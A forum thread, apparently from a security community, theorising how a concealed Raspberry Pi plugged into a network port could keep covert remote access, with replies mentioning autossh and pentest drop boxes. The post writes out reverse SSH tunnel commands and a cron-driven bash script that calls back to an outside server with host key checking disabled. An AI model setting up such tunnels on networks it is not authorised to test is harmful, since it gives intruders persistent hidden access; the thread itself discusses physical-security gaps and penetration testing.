[Theory] A word on Pi and SSH

If you haven’t heard the news of NASA getting hacked via an authorized raspberry pi… you live under a rock, but anyways this so called hack got me thinking. How easy it is to actually keep a raspberry pi undetectable both physically and also software wise?

A few quick google searches and messing around on my rpi gave results that I find slightly scary (just slightly). My theory of how the hack went down was quite simple in nature… setup the pi at an ethernet port that is out of the way and also by a power source. Have it setup with something like raspbian with the option to automatically login as a certain user so therefore we have access to ssh which is enabled as a system service (launches upon boot). SSH should be running on a common port (e.g. 80, 443, 43). It is setup as a remote ssh tunnel with certificates and have it check every minute if it needs to be created via a cronjob. On our system we than listen on the port that the tunnel was created on and as the user at localhost.

This is actually really simple in nature and not my own original content. If you search up ‘ssh reverse tunneling’ you will get a lot of articles on how to do this. The reason why this is possible is because of SSH’s ability to locally port forward a port. The command in question is something along this:

ssh -R 8080:localhost:22 [email protected]

This is run on our pi or whatever. On our own laptop, we do something like this:

ssh -p 8080 [email protected]

So essentially if the theory is correct, all you have to do is setup a bash script to try to make the tunnel and have it be checked every minute via a cronjob. Of course if you want to do it on another network, you would have to port forward the port used. The bash script that I cannot take credit for is:

#!/usr/bin/env bash

createTunnel() {

     /usr/bin/ssh -o 'StrictHostKeyChecking no' -N -R 8080:localhost:80 [email protected]

}

/bin/pidof ssh
if [[ $? -ne 0 ]]; then
          createTunnel
fi

Yeah I know. Really simple. Have a function that creates the tunnel and if the PID is 0, call that function.

Pretty much this proves how simple stuff can be:

  1. Overlooked
  2. Cause a huge security issue
  3. A bit of creativity can go a long way

The latter is what I find intriguing. Humans have the tendency to over think certain things. They can patch all the ‘critical and obvious’ vulns, but something as simple as a Bad USB drop or someone walking through the front door and installing a pi I find overlooked quite a bit.

I know. Quick and dirty, but this was just me sharing a theory. The limit is limitless.

4 Likes

We do this on our physical pentests. You can use a tool called autossh which will create a persistent SSH-connection back to a cloud server of your choosing. This is also how the reverse-SSH feature of Hak5’s LANTurtle works.

We used these as references when building ours;
https://www.vdalabs.com/2018/02/06/penetration-testing-dropboxes/

5 Likes

I read about autossh briefly, but will take a peek at the article you posted.

This topic was automatically closed after 30 days. New replies are no longer allowed.